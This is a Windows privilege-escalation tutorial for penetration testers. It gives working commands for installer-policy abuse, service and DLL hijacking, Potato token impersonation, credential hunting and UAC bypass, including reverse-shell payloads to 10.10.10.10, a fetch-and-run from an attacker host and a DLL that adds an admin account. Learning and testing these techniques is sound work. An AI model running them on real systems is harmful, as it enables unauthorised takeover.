Windows Privilege Escalation: AlwaysInstallElevated, Token Impersonation, and DLL Hijacking
Windows privilege escalation is built on decades of Windows internals quirks: misconfigured services, abusable token privileges, permissive installer policy, and a loader that trusts whatever sits in a writable directory. This guide covers the checks and techniques you will reach for in almost every Windows pentest engagement, roughly in the order you should try them.
Technique Overview
| Technique | Tool | Requirement | Difficulty | MITRE |
|---|---|---|---|---|
| AlwaysInstallElevated | msiexec | Both HKLM and HKCU policy values set to 1 | Easy | T1218.007 |
| Unquoted service path | Manual / sc.exe | Writable directory along the unquoted path | Easy | T1574.009 |
| Weak service permissions | PowerUp / sc.exe / accesschk | Write access to service binary or service config | Easy | T1574.010 |
| Token impersonation (Potato family) | PrintSpoofer / GodPotato / SweetPotato | SeImpersonatePrivilege | Medium | T1134.001 |
| DLL hijacking | Custom DLL + procmon | Writable directory in a privileged process's DLL search path | Medium | T1574.001 |
| Stored credentials | cmdkey /list, registry, config files | Plaintext or reusable creds on disk | Easy | T1555 |
| Scheduled task abuse | schtasks | Writable script or binary run by a privileged task | Easy | T1053.005 |
Initial Enumeration
Understand your foothold before launching any exploits:
:: Who am I and what groups do I belong to?
whoami /all
:: OS version and architecture
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
:: Installed patches (compare against exploit databases; wmic is deprecated on recent builds, Get-HotFix is the PowerShell equivalent)
wmic qfe list brief
:: Running processes
tasklist /v
:: Network connections and listening ports
netstat -ano
:: Environment variables
set
Automated Enumeration Tools
# WinPEAS — Windows Privilege Escalation Awesome Scripts
# Transfer to target and run:
winpeas.exe
# Or in PowerShell:
IEX (New-Object Net.WebClient).DownloadString('http://attacker/winpeas.ps1')
# PowerUp — PowerShell module for common misconfigurations
Import-Module .\PowerUp.ps1
Invoke-AllChecks
# Seatbelt: C# host-survey tool with a smaller footprint than WinPEAS, commonly run in-memory on real engagements. All three are heavily signatured by AV/EDR.
Seatbelt.exe -group=all
AlwaysInstallElevated
Both the machine-wide and the per-user policy value must be set; with both at 1, any user can install an MSI package and the Windows Installer service runs it as NT AUTHORITY\SYSTEM. One value alone is not enough:
:: Check the registry values (both must exist and be 0x1)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
:: If both return 0x1, build a malicious MSI on the attacker machine (msfvenom):
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o evil.msi
:: On target, with a listener waiting on 10.10.10.10:4444: install as the current user, the payload runs as SYSTEM.
:: /quiet /qn suppress the UI; the install itself never completes, which is expected
msiexec /quiet /qn /i evil.msi
Unquoted Service Paths
When a service binary path contains spaces and isn't quoted, CreateProcess tries each space-delimited prefix as an executable name (appending .exe) until one runs. If you can write to a directory along that path, your binary runs as the service account (usually SYSTEM) the next time the service starts:
:: Find auto-start services with unquoted paths outside C:\Windows
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /iv "c:\windows" | findstr /iv """
:: Example vulnerable path:
:: C:\Program Files\Custom App\service.exe
:: Windows tries: C:\Program.exe, then C:\Program Files\Custom.exe, then the real binary
:: Confirm the intercept directory is actually writable first (icacls); a default C:\Program Files is not,
:: so this usually pays off in third-party install directories with loose ACLs
:: Generate the binary on the attacker machine, named for the intercept point...
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe -o Custom.exe
:: ...then drop it on the target at the intercept point
copy Custom.exe "C:\Program Files\Custom.exe"
:: Restart the service if you hold SERVICE_STOP and SERVICE_START on it; otherwise wait for a reboot
:: (in PowerShell call sc.exe explicitly, because sc is an alias for Set-Content)
sc stop "CustomService" && sc start "CustomService"
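The enumeration above as an added PowerShell example (this is not code from the original page): it finds services whose ImagePath is unquoted and contains spaces, lists the executables CreateProcess would try before the real one, and tests whether the current user can write to each of those locations. Nothing is hard-coded; service names and paths come from the host. It assumes PowerShell 5.1 or later on the target.

```powershell
# Added example, not from the original page: enumerate unquoted service paths
# and report the intercept points the current user can actually write to.
# Assumes PowerShell 5.1+; all service data is read from the local host.

function Test-DirectoryWritable {
    param([string]$Directory)
    # Probe by creating and deleting an empty file. Accurate for the current token,
    # but it touches disk; use icacls instead if you need to avoid file-system noise.
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $probe = Join-Path $Directory ([IO.Path]::GetRandomFileName())
    try {
        New-Item -ItemType File -Path $probe -ErrorAction Stop | Out-Null
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if (-not $path) { return }                              # entries with no image
        if ($path.TrimStart().StartsWith('"')) { return }       # quoted: not vulnerable
        # Keep only the executable portion; anything after the first .exe is arguments
        $m = [regex]::Match($path, '^.*?\.exe', 'IgnoreCase')
        $exe = if ($m.Success) { $m.Value } else { $path }
        if ($exe -notmatch ' ') { return }                      # no spaces: nothing to intercept
        if ($exe -like "$env:SystemRoot\*") { return }          # Windows dirs are not user-writable

        # "C:\Program Files\Custom App\service.exe" is tried as
        # C:\Program.exe, then "C:\Program Files\Custom.exe", then the real binary
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            [pscustomobject]@{
                Service   = $_.Name
                StartMode = $_.StartMode
                RunsAs    = $_.StartName
                ImagePath = $path
                Candidate = $candidate
                Writable  = Test-DirectoryWritable (Split-Path -Parent $candidate)
            }
        }
    }
}

# Show only the intercept points you can actually use
Get-UnquotedServicePath | Where-Object Writable | Format-Table Service, RunsAs, StartMode, Candidate -AutoSize
```

Drop your binary at a `Candidate` path where `Writable` is true, then restart the service (or wait for a reboot if `StartMode` is Auto and you lack SERVICE_START).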
Weak Service Permissions
:: Check permissions on the service binary: look for (F), (M) or (W) granted to your user, Users, Everyone or Authenticated Users
icacls "C:\Program Files\VulnerableApp\service.exe"
:: If your user has write access, back up the original and replace the binary
copy evil.exe "C:\Program Files\VulnerableApp\service.exe"
:: Check the service configuration (sc sdshow prints its DACL as SDDL if you want the exact rights)
sc qc "VulnerableService"
:: If you hold SERVICE_CHANGE_CONFIG (DC in the SDDL), point the service at your binary.
:: The space after binpath= is required by sc's parser
sc config "VulnerableService" binpath= "C:\evil\backdoor.exe"
sc start "VulnerableService"
:: Your payload is not a real service binary: the SCM kills it after about 30 seconds for not responding,
:: so have it spawn a child process or migrate quickly, and restore the original binpath when you are done
:: Use accesschk.exe (Sysinternals) to find services writable by low-privileged groups;
:: repeat for "Authenticated Users" and your own account
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
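As an added PowerShell example (not from the original page), the following does what `accesschk -uwcqv` does for your own account without needing a Sysinternals binary on disk: it parses each service's security descriptor (the SDDL that `sc.exe sdshow` prints), keeps the ACEs that apply to the current token's user and group SIDs, and reports services where the effective rights include SERVICE_CHANGE_CONFIG, DELETE, WRITE_DAC, WRITE_OWNER or a generic write/all right. It assumes PowerShell 5.1 or later; nothing is hard-coded.

```powershell
# Added example, not from the original page: find services the current token can
# reconfigure or take over, by parsing the SDDL from sc.exe sdshow.
# Assumes PowerShell 5.1+; service list and descriptors come from the local host.

# Service-specific access bits (winsvc.h) plus the standard rights that matter here
$ServiceRights = [ordered]@{
    SERVICE_CHANGE_CONFIG = 0x00000002
    SERVICE_START         = 0x00000010
    SERVICE_STOP          = 0x00000020
    DELETE                = 0x00010000
    WRITE_DAC             = 0x00040000
    WRITE_OWNER           = 0x00080000
    GENERIC_ALL           = 0x10000000
    GENERIC_WRITE         = 0x40000000
}
# Rights that give code execution as the service account, directly or after one more step
$TakeoverMask = 0x00000002 -bor 0x00010000 -bor 0x00040000 -bor 0x00080000 -bor 0x10000000 -bor 0x40000000

function Get-WritableService {
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    # SIDs the token carries: the user plus every enabled group (deny-only groups are
    # not in .Groups, which is correct for evaluating Allow ACEs)
    $mySids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })

    foreach ($svc in Get-Service -ErrorAction SilentlyContinue) {
        # sc.exe sdshow prints a blank line followed by the SDDL; keep the line starting with D:
        $sddl = & sc.exe sdshow $svc.Name 2>$null | Where-Object { $_ -match '^\s*D:' } | Select-Object -First 1
        if (-not $sddl) { continue }
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor ($sddl.Trim())

        $allowed = 0; $denied = 0
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
            if ($mySids -notcontains $ace.SecurityIdentifier.Value) { continue }
            if ($ace.AceType -eq 'AccessAllowed')    { $allowed = $allowed -bor $ace.AccessMask }
            elseif ($ace.AceType -eq 'AccessDenied') { $denied  = $denied  -bor $ace.AccessMask }
        }
        # Deny ACEs win over Allow ACEs, so mask them out
        $effective = $allowed -band (-bnot $denied)
        if (($effective -band $TakeoverMask) -eq 0) { continue }

        $names = $ServiceRights.Keys | Where-Object { ($effective -band $ServiceRights[$_]) -ne 0 }
        [pscustomobject]@{
            Service = $svc.Name
            Rights  = ($names -join ', ')
            Sddl    = $sddl.Trim()
        }
    }
}

Get-WritableService | Format-Table Service, Rights -AutoSize
```

A hit with SERVICE_CHANGE_CONFIG maps straight onto the `sc config ... binpath=` step above; WRITE_DAC or WRITE_OWNER means you first grant yourself that right with `sc sdset`, then reconfigure.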
Token Impersonation
Token impersonation is one of the most reliable Windows PrivEsc techniques. If you hold SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (granted by default to service accounts such as IIS application pools, SQL Server, NETWORK SERVICE and LOCAL SERVICE), the "Potato" family coerces a SYSTEM-owned component (the print spooler, DCOM/RPC activation, and so on) into authenticating to a listener you control, then impersonates the resulting SYSTEM token:
:: Check current privileges
whoami /priv
:: Look for: SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege (the state may show Disabled; it only has to be present)
:: PrintSpoofer: Windows 10 and Server 2016/2019; needs the Print Spooler service running
PrintSpoofer.exe -i -c cmd
:: RoguePotato: when PrintSpoofer fails (e.g. spooler disabled); needs a redirector on your box
:: forwarding TCP 135 back to the target's listening port (9999 here)
RoguePotato.exe -r 10.10.10.10 -e "cmd.exe" -l 9999
:: JuicyPotato: Windows 7/8, Server 2008/2012, and Windows 10 before 1809
JuicyPotato.exe -l 1337 -p cmd.exe -t * -c {CLSID}
:: The CLSID varies by OS version: use the per-OS list in the JuicyPotato repository
:: GodPotato: Server 2012 through 2022 and Windows 8 through 11; no redirector needed
GodPotato.exe -cmd "cmd /c whoami"
DLL Hijacking
Windows resolves an unqualified DLL name by walking a fixed search order. If a privileged process asks for a DLL that is missing from every location ahead of one you can write to, your DLL is loaded with the process's privileges:
:: Default (SafeDllSearchMode) search order:
:: 1. The directory the executable was loaded from
:: 2. C:\Windows\System32
:: 3. C:\Windows\System (16-bit system directory)
:: 4. C:\Windows
:: 5. The current working directory
:: 6. Directories in PATH, in order
:: Exceptions: DLLs listed under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs are always
:: mapped from System32 without a search, and a manifest or DLL redirection can change the order
:: Use Process Monitor (procmon) to find DLL loads that fail
:: Filter: Process Name is target.exe, Result is NAME NOT FOUND, Path ends with .dll
:: A DLL that is never found at all, with a NAME NOT FOUND hit in a directory you can write to, is your target
:: Create the malicious DLL (DLL_template.c)
#include <windows.h>
#include <stdlib.h>

/* Runs when the DLL is mapped into the victim process. Calling system() inside DllMain
   happens under the loader lock and can deadlock; it usually works for a one-shot
   command like this, but a production payload spawns a thread or uses CreateProcess. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /c net user hacker P@ssw0rd123 /add && net localgroup administrators hacker /add");
    }
    return TRUE;
}
:: Compile on the attacker machine (mingw-w64 cross compiler); match the target process bitness (i686-w64-mingw32-gcc for 32-bit)
x86_64-w64-mingw32-gcc -shared -o missing.dll DLL_template.c
:: If the process imports functions from the missing DLL by name, the load fails unless your DLL exports them too
:: (stub them, or forward them to the real DLL)
:: Place the DLL, named exactly as the missing one, in the writable directory that is searched first (here the application directory)
copy missing.dll "C:\Program Files\VulnerableApp"
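The search-order walk above as an added PowerShell example (not from the original page): given a target executable and the name of a DLL it tries to load (the NAME NOT FOUND entry from procmon), it lists the SafeDllSearchMode candidates in order, marks where a copy already exists, and tests which earlier directories the current user can write to. KnownDLLs are rejected up front because the loader maps them from \KnownDlls without searching. The exe and DLL name in the usage line are hypothetical; it assumes PowerShell 5.1 or later.

```powershell
# Added example, not from the original page: resolve the DLL search order for a
# target exe/DLL pair and find a writable slot ahead of the first real copy.
# Assumes PowerShell 5.1+. The ExePath/DllName in the usage line are hypothetical.

function Get-DllHijackCandidate {
    param(
        [Parameter(Mandatory)][string]$ExePath,
        [Parameter(Mandatory)][string]$DllName
    )
    $knownKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs'
    $knownDlls = (Get-ItemProperty -Path $knownKey).PSObject.Properties |
        Where-Object { $_.Value -is [string] -and $_.Value -like '*.dll' } |
        ForEach-Object { $_.Value.ToLower() }
    if ($knownDlls -contains $DllName.ToLower()) {
        Write-Warning "$DllName is a KnownDLL; it is never resolved through the search order"
        return
    }

    $root  = $env:SystemRoot
    $order = @(
        [IO.Path]::GetDirectoryName([IO.Path]::GetFullPath($ExePath)),  # 1. application directory
        (Join-Path $root 'System32'),                                    # 2. system directory
        (Join-Path $root 'System'),                                      # 3. 16-bit system directory
        $root,                                                           # 4. Windows directory
        (Get-Location).Path                                              # 5. current directory
    )
    # 6. PATH entries, in order
    $order += $env:Path -split ';' | Where-Object { $_.Trim() } |
        ForEach-Object { [Environment]::ExpandEnvironmentVariables($_.Trim()) }

    $found = $false
    $step  = 0
    foreach ($dir in $order) {
        $step++
        $exists = Test-Path -LiteralPath (Join-Path $dir $DllName) -PathType Leaf
        # Only positions before the first existing copy matter; the loader stops there
        $inWindow = -not $found
        if ($exists) { $found = $true }

        $writable = $false
        if ($inWindow -and (Test-Path -LiteralPath $dir -PathType Container)) {
            # Probe with a throwaway file (touches disk; use icacls if that is a problem)
            $probe = Join-Path $dir ([IO.Path]::GetRandomFileName())
            try {
                New-Item -ItemType File -Path $probe -ErrorAction Stop | Out-Null
                Remove-Item -LiteralPath $probe -Force
                $writable = $true
            } catch { }
        }
        [pscustomobject]@{
            Step       = $step
            Directory  = $dir
            DllPresent = $exists
            Writable   = $writable
            # Empty, writable slot ahead of any real copy: drop your DLL here under $DllName.
            # A real copy sitting in a writable directory is a replacement opportunity instead.
            Hijackable = ($inWindow -and -not $exists -and $writable)
        }
    }
}

# Hypothetical target taken from the procmon step
Get-DllHijackCandidate -ExePath 'C:\Program Files\VulnerableApp\app.exe' -DllName 'missing.dll' | Format-Table -AutoSize
```

The interesting case is a `Hijackable` row with a low `Step`: the application directory if the installer left it world-writable, or a PATH entry that a sloppy product added (Python or Ruby install folders are common offenders).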
Stored Credentials
:: Windows Credential Manager: saved credentials the current user can reuse without knowing the password
cmdkey /list
:: If a credential is saved for a privileged account, runas uses it without prompting
runas /savecred /user:DOMAIN\admin "cmd.exe"
:: Registry-stored credentials (AutoLogon DefaultPassword, old VNC installs, SNMP community strings)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
:: Search for "password" in config files under the current directory tree (run from C:\Users, C:\inetpub, application folders)
findstr /si "password" *.txt *.ini *.config *.xml 2>nul
findstr /si "password" C:\inetpub\*.config 2>nul
:: Unattend.xml / sysprep files left over from deployment; the passwords inside are often base64-encoded
dir /b /s C:\Unattend.xml C:\sysprep.inf C:\sysprep\sysprep.xml 2>nul
Scheduled Task Abuse
:: List scheduled tasks
schtasks /query /fo LIST /v | findstr /i /C:"TaskName" /C:"Run As User" /C:"Task To Run"
:: If a task runs as SYSTEM (or another privileged account) and executes a script or binary, check whether you can modify that file
icacls "C:\Scripts\backup.bat"
:: If your user has (W), (M) or (F), append a command; it runs with the task's privileges at the next trigger
echo net user hacker P@ssw0rd /add >> C:\Scripts\backup.bat
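The same check as an added PowerShell example (not from the original page): it lists scheduled tasks that run as SYSTEM/Administrators or with the highest available token and tests whether the current user can open the program or script they execute for writing. Absolute paths inside the task's arguments are checked too, so `cmd.exe /c C:\Scripts\backup.bat` flags the .bat rather than cmd.exe. A writable parent directory (delete and replace) also counts; check that with icacls. It assumes PowerShell 5.1 or later with the ScheduledTasks module (Windows 8 / Server 2012 and later); the tasks come from the host.

```powershell
# Added example, not from the original page: find privileged scheduled tasks whose
# executable or script the current user can modify.
# Assumes PowerShell 5.1+ and the ScheduledTasks module; all data is read from the host.

function Test-FileWritable {
    param([string]$Path)
    try {
        # Open for write without truncating; throws UnauthorizedAccessException if denied
        $fs = [IO.File]::Open($Path, [IO.FileMode]::Open, [IO.FileAccess]::Write, [IO.FileShare]::ReadWrite)
        $fs.Close()
        return $true
    } catch {
        return $false
    }
}

function Get-WritableTaskAction {
    $privileged = 'SYSTEM', 'NT AUTHORITY\SYSTEM', 'S-1-5-18', 'LocalSystem', 'Administrators', 'BUILTIN\Administrators'
    # Absolute Windows paths in arguments, quoted (may contain spaces) or bare
    $pathRx = '"(?<q>[A-Za-z]:\\[^"]+)"|(?<u>[A-Za-z]:\\\S+)'

    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        $who  = $task.Principal.UserId
        $high = ($privileged -contains $who) -or ($task.Principal.RunLevel -eq 'Highest')
        if (-not $high) { continue }

        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }      # COM handler / e-mail actions have no Execute
            $candidates = @([Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"')))
            if ($action.Arguments) {
                $candidates += [regex]::Matches($action.Arguments, $pathRx) | ForEach-Object {
                    $raw = if ($_.Groups['q'].Success) { $_.Groups['q'].Value } else { $_.Groups['u'].Value }
                    [Environment]::ExpandEnvironmentVariables($raw)
                }
            }
            foreach ($file in $candidates) {
                if (-not (Test-Path -LiteralPath $file -PathType Leaf)) { continue }   # skips bare names like cmd.exe
                if (-not (Test-FileWritable $file)) { continue }
                [pscustomobject]@{
                    Task     = Join-Path $task.TaskPath $task.TaskName
                    RunsAs   = $who
                    RunLevel = $task.Principal.RunLevel
                    File     = $file
                    Command  = "$($action.Execute) $($action.Arguments)".Trim()
                }
            }
        }
    }
}

Get-WritableTaskAction | Format-Table -AutoSize
```

Pair a hit with `Get-ScheduledTaskInfo -TaskName <name>` to read `NextRunTime`, so you know whether to wait or to trigger it yourself with `schtasks /run` (which needs its own permission on the task).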
UAC Bypass
UAC is not a security boundary. If your user is in the local Administrators group but your shell runs at medium integrity (the filtered token), a bypass hands you a high-integrity process without a consent prompt, as long as UAC is not set to "Always notify". The classic variants abuse auto-elevating Microsoft binaries that read a shell handler from HKCU, which you control:
:: fodhelper.exe bypass (Windows 10)
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
fodhelper.exe
:: eventvwr.exe bypass (Windows 7 through Windows 10 before 1703, where it was patched)
reg add HKCU\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f
eventvwr.exe
:: Remove the HKCU\Software\Classes keys you added afterwards; they are a well-known detection artifact
:: UACME (ships as Akagi64.exe / Akagi32.exe): comprehensive collection of UAC bypass techniques selected by method number;
:: the README table says what each method does and which builds it still works on
Akagi64.exe 41
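Before running any of these, confirm a bypass is actually the right move. As an added PowerShell example (not from the original page), the function below parses `whoami /groups /fo csv` to see whether the Administrators group sits on the token as "deny only" (admin user, filtered medium-integrity token: bypass applies) or fully enabled (already elevated: nothing to bypass), reads the integrity label, and checks the UAC policy values, since auto-elevation tricks like fodhelper fail when UAC is set to "Always notify" (ConsentPromptBehaviorAdmin = 2). It assumes PowerShell 5.1 or later and English whoami output.

```powershell
# Added example, not from the original page: decide whether a UAC bypass applies
# to the current token. Assumes PowerShell 5.1+ and English-language whoami output.

function Get-UacContext {
    # whoami /groups /fo csv columns: "Group Name","Type","SID","Attributes"
    $groups = whoami /groups /fo csv | Where-Object { $_.Trim() } | ConvertFrom-Csv
    $admins = $groups | Where-Object SID -eq 'S-1-5-32-544'                       # BUILTIN\Administrators
    $label  = $groups | Where-Object { $_.'Group Name' -like 'Mandatory Label\*' } # integrity level row

    $isAdminUser = [bool]$admins
    # On a filtered token the group is present but marked "Group used for deny only"
    $isElevated  = $isAdminUser -and ($admins.Attributes -notmatch 'deny only') -and ($admins.Attributes -match 'Enabled group')
    $integrity   = if ($label) { $label.'Group Name' -replace '^Mandatory Label\\', '' } else { 'unknown' }

    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    # ConsentPromptBehaviorAdmin: 0 = elevate silently, 2 = always notify (no auto-elevation),
    # 5 = prompt only for non-Windows binaries (the default that fodhelper-style bypasses rely on)
    $alwaysNotify = ($pol.ConsentPromptBehaviorAdmin -eq 2)
    $uacOn        = ($pol.EnableLUA -ne 0)

    [pscustomobject]@{
        User                       = [Security.Principal.WindowsIdentity]::GetCurrent().Name
        IntegrityLevel             = $integrity
        IsLocalAdmin               = $isAdminUser
        IsElevated                 = $isElevated
        UacEnabled                 = $uacOn
        ConsentPromptBehaviorAdmin = $pol.ConsentPromptBehaviorAdmin
        AlwaysNotify               = $alwaysNotify
        # Worth attempting only when: admin user, not yet elevated, UAC on, and not "Always notify"
        BypassApplicable           = ($isAdminUser -and -not $isElevated -and $uacOn -and -not $alwaysNotify)
    }
}

Get-UacContext
```

If `IsLocalAdmin` is false, UAC is irrelevant and you are back in the service/token/DLL sections above; if `AlwaysNotify` is true, the registry-handler tricks will pop a prompt instead of elevating silently.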